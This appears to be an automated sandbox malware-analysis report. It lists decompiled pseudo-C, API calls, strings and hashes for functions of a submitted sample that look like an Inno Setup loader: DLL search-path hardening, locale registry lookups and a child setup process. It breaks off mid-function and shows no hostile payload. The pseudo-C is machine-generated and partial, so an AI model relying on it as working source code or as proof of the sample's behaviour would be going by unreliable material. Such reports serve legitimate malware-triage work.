                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B5114 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 73%
                                                                                                                            			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}





























                                                                                                                            0x004b5115
                                                                                                                            0x004b5117
                                                                                                                            0x004b511c
                                                                                                                            0x004b511c
                                                                                                                            0x004b511e
                                                                                                                            0x004b5120
                                                                                                                            0x004b5120
                                                                                                                            0x004b5128
                                                                                                                            0x004b5129
                                                                                                                            0x004b512e
                                                                                                                            0x004b5131
                                                                                                                            0x004b5134
                                                                                                                            0x004b513b
                                                                                                                            0x004b536d
                                                                                                                            0x004b536f
                                                                                                                            0x004b5372
                                                                                                                            0x004b5375
                                                                                                                            0x004b5387
                                                                                                                            0x004b5141
                                                                                                                            0x004b514b
                                                                                                                            0x004b514d
                                                                                                                            0x004b5154
                                                                                                                            0x004b515a
                                                                                                                            0x004b5167
                                                                                                                            0x004b516b
                                                                                                                            0x004b5172
                                                                                                                            0x004b5177
                                                                                                                            0x004b5179
                                                                                                                            0x004b5179
                                                                                                                            0x004b516b
                                                                                                                            0x004b517c
                                                                                                                            0x004b5188
                                                                                                                            0x004b518f
                                                                                                                            0x004b5196
                                                                                                                            0x004b5196
                                                                                                                            0x004b519b
                                                                                                                            0x004b51a8
                                                                                                                            0x004b51b4
                                                                                                                            0x004b51ba
                                                                                                                            0x004b51c1
                                                                                                                            0x004b51c6
                                                                                                                            0x004b51c6
                                                                                                                            0x004b51d4
                                                                                                                            0x004b51e0
                                                                                                                            0x004b51e0
                                                                                                                            0x004b51f3
                                                                                                                            0x004b51fb
                                                                                                                            0x004b520e
                                                                                                                            0x004b5216
                                                                                                                            0x004b5229
                                                                                                                            0x004b5231
                                                                                                                            0x004b5244
                                                                                                                            0x004b524c
                                                                                                                            0x004b525f
                                                                                                                            0x004b5267
                                                                                                                            0x004b527a
                                                                                                                            0x004b5282
                                                                                                                            0x004b5295
                                                                                                                            0x004b529d
                                                                                                                            0x004b52b0
                                                                                                                            0x004b52b8
                                                                                                                            0x004b52cb
                                                                                                                            0x004b52d3
                                                                                                                            0x004b52e6
                                                                                                                            0x004b52ee
                                                                                                                            0x004b5301
                                                                                                                            0x004b5309
                                                                                                                            0x004b531c
                                                                                                                            0x004b5324
                                                                                                                            0x004b5337
                                                                                                                            0x004b533f
                                                                                                                            0x004b533f
                                                                                                                            0x004b51b4
                                                                                                                            0x004b534a
                                                                                                                            0x004b5351
                                                                                                                            0x004b5358
                                                                                                                            0x004b5358
                                                                                                                            0x004b5360
                                                                                                                            0x004b5367
                                                                                                                            0x004b536b
                                                                                                                            0x004b536b
                                                                                                                            0x00000000
                                                                                                                            0x004b5367

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                                                                                            • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                                                                                              • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                                                                                              • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                                                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                                                                                            • API String ID: 2248137261-3182217745
                                                                                                                            • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                                                            • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                                                                                            • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                                                            • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AB18 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                                                                                            0x0040ab19
                                                                                                                            0x0040ab1b
                                                                                                                            0x0040ab22
                                                                                                                            0x0040ab24
                                                                                                                            0x0040ab2a
                                                                                                                            0x0040ab31
                                                                                                                            0x0040ab32
                                                                                                                            0x0040ab37
                                                                                                                            0x0040ab3a
                                                                                                                            0x0040ab41
                                                                                                                            0x0040ab6d
                                                                                                                            0x0040ab43
                                                                                                                            0x0040ab51
                                                                                                                            0x0040ab51
                                                                                                                            0x0040ab7a
                                                                                                                            0x0040ad27
                                                                                                                            0x0040ad29
                                                                                                                            0x0040ad2c
                                                                                                                            0x0040ad2f
                                                                                                                            0x0040ad3c
                                                                                                                            0x0040ab80
                                                                                                                            0x0040ab82
                                                                                                                            0x0040ab9a
                                                                                                                            0x0040aba1
                                                                                                                            0x0040ac41
                                                                                                                            0x0040ac43
                                                                                                                            0x0040ac44
                                                                                                                            0x0040ac49
                                                                                                                            0x0040ac4c
                                                                                                                            0x0040ac5a
                                                                                                                            0x0040ac7b
                                                                                                                            0x0040acca
                                                                                                                            0x0040acd4
                                                                                                                            0x0040acec
                                                                                                                            0x0040acf6
                                                                                                                            0x0040acf6
                                                                                                                            0x0040ac7d
                                                                                                                            0x0040ac85
                                                                                                                            0x0040ac9f
                                                                                                                            0x0040aca9
                                                                                                                            0x0040aca9
                                                                                                                            0x0040acfd
                                                                                                                            0x0040ad00
                                                                                                                            0x0040ad03
                                                                                                                            0x0040ad0c
                                                                                                                            0x0040ad11
                                                                                                                            0x0040ad11
                                                                                                                            0x0040ad1f
                                                                                                                            0x0040aba7
                                                                                                                            0x0040abbc
                                                                                                                            0x0040abc3
                                                                                                                            0x00000000
                                                                                                                            0x0040abc5
                                                                                                                            0x0040abda
                                                                                                                            0x0040abe1
                                                                                                                            0x00000000
                                                                                                                            0x0040abe3
                                                                                                                            0x0040abf8
                                                                                                                            0x0040abff
                                                                                                                            0x00000000
                                                                                                                            0x0040ac01
                                                                                                                            0x0040ac16
                                                                                                                            0x0040ac1d
                                                                                                                            0x00000000
                                                                                                                            0x0040ac1f
                                                                                                                            0x0040ac34
                                                                                                                            0x0040ac3b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ac3b
                                                                                                                            0x0040ac1d
                                                                                                                            0x0040abff
                                                                                                                            0x0040abe1
                                                                                                                            0x0040abc3
                                                                                                                            0x0040aba1

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                                                                                            • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                                                            • API String ID: 2701450724-3496071916
                                                                                                                            • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                                                            • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                                                                                            • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                                                            • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B63A1 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0xb0054
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0xb0054
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4d703c
				_t4 = _t26 + 0x20; // 0xe0e1a
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4d703c
				_t7 = _t28 + 0x24; // 0xcb000
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0xb0054
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x19
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}
























                                                                                                                            0x004b63a1
                                                                                                                            0x004b63a1
                                                                                                                            0x004b63a1
                                                                                                                            0x004b63a1
                                                                                                                            0x004b63a3
                                                                                                                            0x004b63a6
                                                                                                                            0x004b63d3
                                                                                                                            0x004b63da
                                                                                                                            0x004b63e0
                                                                                                                            0x004b6407
                                                                                                                            0x004b640c
                                                                                                                            0x004b6418
                                                                                                                            0x004b6423
                                                                                                                            0x004b642c
                                                                                                                            0x004b6431
                                                                                                                            0x004b6434
                                                                                                                            0x004b6438
                                                                                                                            0x004b643d
                                                                                                                            0x004b6440
                                                                                                                            0x004b6443
                                                                                                                            0x004b6447
                                                                                                                            0x004b644c
                                                                                                                            0x004b644f
                                                                                                                            0x004b6452
                                                                                                                            0x004b6463
                                                                                                                            0x004b6468
                                                                                                                            0x004b646b
                                                                                                                            0x004b6471
                                                                                                                            0x004b6479
                                                                                                                            0x004b647e
                                                                                                                            0x004b6489
                                                                                                                            0x004b6496
                                                                                                                            0x004b649b
                                                                                                                            0x004b64a7
                                                                                                                            0x004b64a9
                                                                                                                            0x004b64ae
                                                                                                                            0x004b64ae
                                                                                                                            0x004b64b5
                                                                                                                            0x004b64b8
                                                                                                                            0x004b64bb
                                                                                                                            0x004b64c0
                                                                                                                            0x004b64c5
                                                                                                                            0x004b64d1
                                                                                                                            0x004b64df
                                                                                                                            0x004b64e7
                                                                                                                            0x004b64e7
                                                                                                                            0x004b64f3
                                                                                                                            0x004b64f5
                                                                                                                            0x004b6500
                                                                                                                            0x004b6500
                                                                                                                            0x004b650c
                                                                                                                            0x004b650e
                                                                                                                            0x004b6514
                                                                                                                            0x004b6514
                                                                                                                            0x004b6520
                                                                                                                            0x004b6522
                                                                                                                            0x004b6527
                                                                                                                            0x004b652d
                                                                                                                            0x004b6533
                                                                                                                            0x004b6538
                                                                                                                            0x004b653d
                                                                                                                            0x004b6544
                                                                                                                            0x00000000
                                                                                                                            0x004b6544
                                                                                                                            0x004b6549

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                                                                                            • SetWindowLongW.USER32(000B0054,000000FC,004AF69C), ref: 004B641E
                                                                                                                              • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                                                                                              • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                                                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                                                                              • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                                                                              • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                                                            • DestroyWindow.USER32(000B0054,004B6554), ref: 004B6514
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                            • String ID: /SL5="$%x,%d,%d,$<pM$InnoSetupLdrWindow$STATIC
                                                                                                                            • API String ID: 3586484885-2916600167
                                                                                                                            • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                                                                            • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                                                                                            • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                                                                            • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040426C Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 150 40426c-40427b 151 404281-404285 150->151 152 404364-404367 150->152 153 404287-40428e 151->153 154 4042e8-4042f1 151->154 155 404454-404458 152->155 156 40436d-404377 152->156 160 404290-40429b 153->160 161 4042bc-4042be 153->161 154->153 159 4042f3-4042fc 154->159 157 403cf8-403d1d call 403c48 155->157 158 40445e-404463 155->158 162 404328-404335 156->162 163 404379-404385 156->163 183 403d39-403d40 157->183 184 403d1f-403d2e VirtualFree 157->184 159->154 166 4042fe-404312 Sleep 159->166 169 4042a4-4042b9 160->169 170 40429d-4042a2 160->170 164 4042c0-4042d1 161->164 165 4042d3 161->165 162->163 167 404337-404340 162->167 171 404387-40438a 163->171 172 4043bc-4043ca 163->172 164->165 174 4042d6-4042e3 164->174 165->174 166->153 176 404318-404323 Sleep 166->176 167->162 177 404342-404356 Sleep 167->177 173 40438e-404392 171->173 172->173 175 4043cc-4043d1 call 403ac0 172->175 179 4043d4-4043e1 173->179 180 404394-40439a 173->180 174->156 175->173 176->154 177->163 182 404358-40435f Sleep 177->182 179->180 191 4043e3-4043ea call 403ac0 179->191 187 4043ec-4043f6 180->187 188 40439c-4043ba call 403b00 180->188 182->162 189 403d42-403d5e VirtualQuery VirtualFree 183->189 185 403d30-403d32 184->185 186 403d34-403d37 184->186 192 403d73-403d75 185->192 186->192 197 404424-404451 call 403b60 187->197 198 4043f8-404420 VirtualFree 187->198 194 403d60-403d63 189->194 195 403d65-403d6b 189->195 191->180 202 403d77-403d87 192->202 203 403d8a-403d9a 192->203 194->192 195->192 201 403d6d-403d71 195->201 201->189 202->203
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
